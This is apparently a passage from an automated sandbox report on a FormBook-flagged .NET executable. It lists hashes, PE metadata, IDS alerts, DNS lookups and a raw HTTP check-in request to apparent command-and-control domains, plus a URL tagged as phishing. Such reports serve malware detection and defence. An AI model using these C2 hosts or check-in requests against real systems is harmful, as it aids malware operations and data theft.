                                    http://email.r1.mppwc.com/c/eJyEkkuvgjocxD8N7jCl1EIXLvCBD0RE5Rx1Y0qpFh8USxXw09-cR-49u5s0mWR-M53Nn6mMato3nIEBoW5LbkBo2J4BYaokzRit9JcDh3-dY579xDAiDvmBlDH5LP5DlgWc3x6ThabsT8vBEEGAf2jFH09eMP4v_t77rfIX__PnL3FGnazPLeQ6qMP7FiYIAGIR3BF97joEpcCx7F4vs3oUYgxPiJ8woxBhSjt5HwJoAwKwhQC2e10XAJACJz2Rnu1SQg0ElNW9l2XNukzeO7e-0Lqsvtd9A_oKgq6qcLfg2oC-LrqXqjRs_2TYIwAszyq24WNR4Ou68pZ40czOn2Y6Uxf3mDiCt4l5PfnvcKInEMW7gVlrvFjaq5mqX9HFXZ8mzUtUxboOVunQBbNtHFxqyGkdkXkc7uwJ75XZeBr5x3yg0uSZP59ZexUKgd5p66vV207jat-zY-w-xEGa5kUGy4Hkj0fthnJxaFp6WDVlEUIpF8kR-LYVJHacNx-joNXDT-gzUkj3Y4bHe9OpL8QUgfn5ai4jcxTqz6EQ7w-hqjDYbabTPAVIyuc-WF6BdlqLP6KZjo7V0UIJfc1hsqxW5LVvxvGyfUB2BNt7iwrhNjS_r84NCLxSDjznMqLz0BmmQRw_1-BKy0G2O2w8LMVm_cz3i-2qdhl501afg-v4XSW1-Wbymgyix2Rfe5XfSyKc-jZZqegaznf26rqL9Tidxu-T9vhZpAoNay9kO0814nyI7-QgvcVk75G4es8Pr8mGc6c875bZU7DsbM3q_RSj82yIcF6bh9eNRSUX43Zb7I91Wcy2g4m9kbfIfZe8Od1IWRv26OtBzH5FfKvNhMorLUvBVVfT4mwgcGNUa660LL6vS_X_P6P7w_U_AQAA__9j_SfFGet hashmaliciousHTMLPhisherBrowse
                                    • 104.17.24.14
                                    Proforma_Invoice.exeGet hashmaliciousLokibotBrowse
                                    • 172.67.192.236

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2FcJgghyXg.exe.log

                                    Download File
                                    Process:C:\Users\user\Desktop\2FcJgghyXg.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1216
                                    Entropy (8bit):5.348426668631405
                                    Encrypted:false
                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKAKhPKIE4oKqiKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh1oPtHochAHKze0HJ
                                    MD5:3449F05150847E4D3969CCA837E4A6AA
                                    SHA1:94A23D6FBBD3389B0019674A6B73F4312AF579A7
                                    SHA-256:F6B12276037CDAF4907651D712DA7F4856E2D439F3344CF1C4EA15F74CD0C105
                                    SHA-512:BA4A2F8B480B3FFAD133BF100AF815EE78A9753BE06C22374F7292DC4D0A588851B5AEE1DB78A8F0AE3E030A61DCD6AE25BED9A4C39E2273EF91120D53EA1993
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\45a9a2a2deda365165595326f2f13be6\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\bf1f4d743828bbf720baf57f6a37ce02\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):6.1938268895265844
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:2FcJgghyXg.exe
                                    File size:995'840 bytes
                                    MD5:4f91d6f43a69717ff16f3c09dcd0e7e8
                                    SHA1:51406ad0646c199764a7b2a26e2d31fed91ad77f
                                    SHA256:035c64adedb7e567711f5a793c587b5886bea69e725a5f038f2b7f01a1eebd5d
                                    SHA512:522ee1826085dfee09138c7e69e02d81a66f0157ffc3164417b2aca5a34891e150615520edb8ddbd817307fa2994b7cd3f14bf4daef1bfb82acb14fd18859ba3
                                    SSDEEP:12288:GPGFbjnlnvSYq7VFFKtanTtcDPHNtr0P18UEbotQ:GajlnqntLTtcLHNtrK8HJ
                                    TLSH:5F2553FC5CFC1136D9A0EE908ED9851BB1C0A57FF289AC1D97E20B650252A49F88753F
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5................0..(...........F... ...`....@.. ....................................@................................

                                    File Icon

                                    Icon Hash:90cececece8e8eb0

                                    Static PE Info

                                    General

                                    Entrypoint:0x4f46ba
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0xA9C135F0 [Thu Apr 1 02:22:40 2060 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xf46670x4f.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xf60000x5d8.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xf80000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xf2d900x70.text
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000xf26c00xf2800False0.5605297599871134OpenPGP Public Key6.197752996370087IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc0xf60000x5d80x600False0.431640625data4.178744768711675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0xf80000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_VERSION0xf60900x348data0.4297619047619048
                                    RT_MANIFEST0xf63e80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                    Imports

                                    DLLImport
                                    mscoree.dll_CorExeMain

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    192.168.2.834.120.175.6549774802031412 09/07/23-08:40:07.074597TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977480192.168.2.834.120.175.65
                                    192.168.2.866.235.200.14549773802031412 09/07/23-08:39:43.584229TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977380192.168.2.866.235.200.145
                                    192.168.2.8104.21.48.6849772802031412 09/07/23-08:39:22.654043TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977280192.168.2.8104.21.48.68
                                    192.168.2.891.195.240.12349771802031412 09/07/23-08:39:01.528390TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.891.195.240.123
                                    192.168.2.88.8.8.859429532023883 09/07/23-08:40:05.355051UDP2023883ET DNS Query to a *.top domain - Likely Hostile5942953192.168.2.88.8.8.8

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 7, 2023 08:38:15.168216944 CEST4970980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:15.481720924 CEST4970980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:16.091490984 CEST4970980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:17.294528008 CEST4970980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:18.404087067 CEST49688443192.168.2.8204.79.197.203
                                    Sep 7, 2023 08:38:18.519192934 CEST4968980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:18.716509104 CEST49688443192.168.2.8204.79.197.203
                                    Sep 7, 2023 08:38:18.825829029 CEST4968980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:19.325841904 CEST49688443192.168.2.8204.79.197.203
                                    Sep 7, 2023 08:38:19.435262918 CEST4968980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:19.700877905 CEST4970980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:20.529165030 CEST49688443192.168.2.8204.79.197.203
                                    Sep 7, 2023 08:38:20.638587952 CEST4968980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:20.718303919 CEST4970380192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:20.720813036 CEST4970280192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:21.029684067 CEST4970380192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:21.029685974 CEST4970280192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:21.638560057 CEST4970380192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:21.641443968 CEST4970280192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:22.841756105 CEST4970380192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:22.841759920 CEST4970280192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:22.935703039 CEST49688443192.168.2.8204.79.197.203
                                    Sep 7, 2023 08:38:23.045326948 CEST4968980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:24.513827085 CEST4970980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:25.248215914 CEST4970380192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:25.249921083 CEST4970280192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:27.748444080 CEST49688443192.168.2.8204.79.197.203
                                    Sep 7, 2023 08:38:27.876285076 CEST4968980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:30.170613050 CEST4970380192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:30.170761108 CEST4970280192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:32.061820984 CEST4971980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:32.373914003 CEST4971980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:33.061518908 CEST4971980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:34.124080896 CEST4970980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:34.276146889 CEST4971980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:36.686846018 CEST4971980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:37.358659029 CEST49688443192.168.2.8204.79.197.203
                                    Sep 7, 2023 08:38:37.483685970 CEST4968980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:39.780746937 CEST4970380192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:39.782044888 CEST4970280192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:41.499728918 CEST4971980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:38:51.141220093 CEST4971980192.168.2.8192.229.221.95
                                    Sep 7, 2023 08:39:01.210989952 CEST4977180192.168.2.891.195.240.123
                                    Sep 7, 2023 08:39:01.527806044 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:01.528043032 CEST4977180192.168.2.891.195.240.123
                                    Sep 7, 2023 08:39:01.528389931 CEST4977180192.168.2.891.195.240.123
                                    Sep 7, 2023 08:39:01.876094103 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:01.876183987 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:01.876255989 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:01.876389980 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:01.876463890 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:01.876480103 CEST4977180192.168.2.891.195.240.123
                                    Sep 7, 2023 08:39:01.876555920 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:01.876624107 CEST4977180192.168.2.891.195.240.123
                                    Sep 7, 2023 08:39:01.876629114 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:01.876705885 CEST4977180192.168.2.891.195.240.123
                                    Sep 7, 2023 08:39:01.876708031 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:01.876780033 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:01.876822948 CEST4977180192.168.2.891.195.240.123
                                    Sep 7, 2023 08:39:01.876853943 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:01.876959085 CEST4977180192.168.2.891.195.240.123
                                    Sep 7, 2023 08:39:02.017555952 CEST4977180192.168.2.891.195.240.123
                                    Sep 7, 2023 08:39:02.193577051 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:02.193628073 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:02.193661928 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:02.193691969 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:02.193723917 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:02.193753958 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:02.193794012 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:02.193797112 CEST4977180192.168.2.891.195.240.123
                                    Sep 7, 2023 08:39:02.193825006 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:02.193857908 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:02.193862915 CEST4977180192.168.2.891.195.240.123
                                    Sep 7, 2023 08:39:02.193881989 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:02.193926096 CEST4977180192.168.2.891.195.240.123
                                    Sep 7, 2023 08:39:02.193944931 CEST4977180192.168.2.891.195.240.123
                                    Sep 7, 2023 08:39:02.334511995 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:02.334711075 CEST4977180192.168.2.891.195.240.123
                                    Sep 7, 2023 08:39:22.492707968 CEST4977280192.168.2.8104.21.48.68
                                    Sep 7, 2023 08:39:22.653743982 CEST8049772104.21.48.68192.168.2.8
                                    Sep 7, 2023 08:39:22.653928995 CEST4977280192.168.2.8104.21.48.68
                                    Sep 7, 2023 08:39:22.654042959 CEST4977280192.168.2.8104.21.48.68
                                    Sep 7, 2023 08:39:22.815152884 CEST8049772104.21.48.68192.168.2.8
                                    Sep 7, 2023 08:39:22.856993914 CEST8049772104.21.48.68192.168.2.8
                                    Sep 7, 2023 08:39:22.857034922 CEST8049772104.21.48.68192.168.2.8
                                    Sep 7, 2023 08:39:22.857064962 CEST8049772104.21.48.68192.168.2.8
                                    Sep 7, 2023 08:39:22.857310057 CEST4977280192.168.2.8104.21.48.68
                                    Sep 7, 2023 08:39:22.857393026 CEST4977280192.168.2.8104.21.48.68
                                    Sep 7, 2023 08:39:43.422524929 CEST4977380192.168.2.866.235.200.145
                                    Sep 7, 2023 08:39:43.583822966 CEST804977366.235.200.145192.168.2.8
                                    Sep 7, 2023 08:39:43.584053993 CEST4977380192.168.2.866.235.200.145
                                    Sep 7, 2023 08:39:43.584228992 CEST4977380192.168.2.866.235.200.145
                                    Sep 7, 2023 08:39:43.745253086 CEST804977366.235.200.145192.168.2.8
                                    Sep 7, 2023 08:39:43.939963102 CEST804977366.235.200.145192.168.2.8
                                    Sep 7, 2023 08:39:43.940239906 CEST804977366.235.200.145192.168.2.8
                                    Sep 7, 2023 08:39:43.940341949 CEST4977380192.168.2.866.235.200.145
                                    Sep 7, 2023 08:39:43.940463066 CEST4977380192.168.2.866.235.200.145
                                    Sep 7, 2023 08:39:44.101413012 CEST804977366.235.200.145192.168.2.8
                                    Sep 7, 2023 08:40:06.896670103 CEST4977480192.168.2.834.120.175.65
                                    Sep 7, 2023 08:40:07.074250937 CEST804977434.120.175.65192.168.2.8
                                    Sep 7, 2023 08:40:07.074388027 CEST4977480192.168.2.834.120.175.65
                                    Sep 7, 2023 08:40:07.074596882 CEST4977480192.168.2.834.120.175.65
                                    Sep 7, 2023 08:40:07.252485991 CEST804977434.120.175.65192.168.2.8
                                    Sep 7, 2023 08:40:07.392153978 CEST804977434.120.175.65192.168.2.8
                                    Sep 7, 2023 08:40:07.392225981 CEST804977434.120.175.65192.168.2.8
                                    Sep 7, 2023 08:40:07.392257929 CEST804977434.120.175.65192.168.2.8
                                    Sep 7, 2023 08:40:07.392286062 CEST804977434.120.175.65192.168.2.8
                                    Sep 7, 2023 08:40:07.392321110 CEST804977434.120.175.65192.168.2.8
                                    Sep 7, 2023 08:40:07.392340899 CEST804977434.120.175.65192.168.2.8
                                    Sep 7, 2023 08:40:07.392362118 CEST804977434.120.175.65192.168.2.8
                                    Sep 7, 2023 08:40:07.392455101 CEST4977480192.168.2.834.120.175.65
                                    Sep 7, 2023 08:40:07.392499924 CEST4977480192.168.2.834.120.175.65
                                    Sep 7, 2023 08:40:08.534625053 CEST4977480192.168.2.834.120.175.65

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 7, 2023 08:39:00.929970980 CEST5293253192.168.2.88.8.8.8
                                    Sep 7, 2023 08:39:01.207607985 CEST53529328.8.8.8192.168.2.8
                                    Sep 7, 2023 08:39:22.286114931 CEST4925053192.168.2.88.8.8.8
                                    Sep 7, 2023 08:39:22.491281986 CEST53492508.8.8.8192.168.2.8
                                    Sep 7, 2023 08:39:43.147365093 CEST5196253192.168.2.88.8.8.8
                                    Sep 7, 2023 08:39:43.421124935 CEST53519628.8.8.8192.168.2.8
                                    Sep 7, 2023 08:40:05.355051041 CEST5942953192.168.2.88.8.8.8
                                    Sep 7, 2023 08:40:06.894923925 CEST53594298.8.8.8192.168.2.8

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Sep 7, 2023 08:39:00.929970980 CEST192.168.2.88.8.8.80xa4aStandard query (0)www.emdefencetech.comA (IP address)IN (0x0001)false
                                    Sep 7, 2023 08:39:22.286114931 CEST192.168.2.88.8.8.80xa58eStandard query (0)www.nazadypro.shopA (IP address)IN (0x0001)false
                                    Sep 7, 2023 08:39:43.147365093 CEST192.168.2.88.8.8.80xe5faStandard query (0)www.soccercitycupsc.comA (IP address)IN (0x0001)false
                                    Sep 7, 2023 08:40:05.355051041 CEST192.168.2.88.8.8.80x8af1Standard query (0)www.69v39.topA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Sep 7, 2023 08:39:01.207607985 CEST8.8.8.8192.168.2.80xa4aNo error (0)www.emdefencetech.com91.195.240.123A (IP address)IN (0x0001)false
                                    Sep 7, 2023 08:39:22.491281986 CEST8.8.8.8192.168.2.80xa58eNo error (0)www.nazadypro.shop104.21.48.68A (IP address)IN (0x0001)false
                                    Sep 7, 2023 08:39:22.491281986 CEST8.8.8.8192.168.2.80xa58eNo error (0)www.nazadypro.shop172.67.180.82A (IP address)IN (0x0001)false
                                    Sep 7, 2023 08:39:43.421124935 CEST8.8.8.8192.168.2.80xe5faNo error (0)www.soccercitycupsc.comsoccercitycupsc.comCNAME (Canonical name)IN (0x0001)false
                                    Sep 7, 2023 08:39:43.421124935 CEST8.8.8.8192.168.2.80xe5faNo error (0)soccercitycupsc.com66.235.200.145A (IP address)IN (0x0001)false
                                    Sep 7, 2023 08:40:06.894923925 CEST8.8.8.8192.168.2.80x8af1No error (0)www.69v39.top34.120.175.65A (IP address)IN (0x0001)false
                                    Sep 7, 2023 08:40:06.894923925 CEST8.8.8.8192.168.2.80x8af1No error (0)www.69v39.top35.244.161.158A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • www.emdefencetech.com
                                    • www.nazadypro.shop
                                    • www.soccercitycupsc.com
                                    • www.69v39.top

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.84977191.195.240.12380C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 7, 2023 08:39:01.528389931 CEST140OUTGET /us94/?FV9l7b=09CVAw2tWRgghkhUEy5C5oLzHr5PLkNGN/bgaCa/HPdap5UhvkEM57dmWPBbgbvu1iSh&BbW=QzuhmF0pKL HTTP/1.1
                                    Host: www.emdefencetech.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 7, 2023 08:39:01.876094103 CEST141INHTTP/1.1 200 OK
                                    date: Thu, 07 Sep 2023 06:39:01 GMT
                                    content-type: text/html; charset=UTF-8
                                    transfer-encoding: chunked
                                    vary: Accept-Encoding
                                    x-powered-by: PHP/8.1.17
                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                    pragma: no-cache
                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Hy6RGj3U2trNFDIi49tEQi0GZsQFxr7l0Ray0Ffsh9iRYzorE4BdUxuNADlZG2tZwzAnW9QWCppMCJ9Mq/PPUA==
                                    last-modified: Thu, 07 Sep 2023 06:39:01 GMT
                                    x-cache-miss-from: parking-6f7d579cd8-6rwdm
                                    server: NginX
                                    connection: close
                                    Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 48 79 36 52 47 6a 33 55 32 74 72 4e 46 44 49 69 34 39 74 45 51 69 30 47 5a 73 51 46 78 72 37 6c 30 52 61 79 30 46 66 73 68 39 69 52 59 7a 6f 72 45 34 42 64 55 78 75 4e 41 44 6c 5a 47 32 74 5a 77 7a 41 6e 57 39 51 57 43 70 70 4d 43 4a 39 4d 71 2f 50 50 55 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 65 6d 64 65 66 65 6e 63 65 74 65 63 68 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 65 6d 64 65 66 65 6e 63 65 74 65 63 68 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6d 64 65 66 65 6e 63 65 74 65 63 68 2e 63 6f 6d 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e
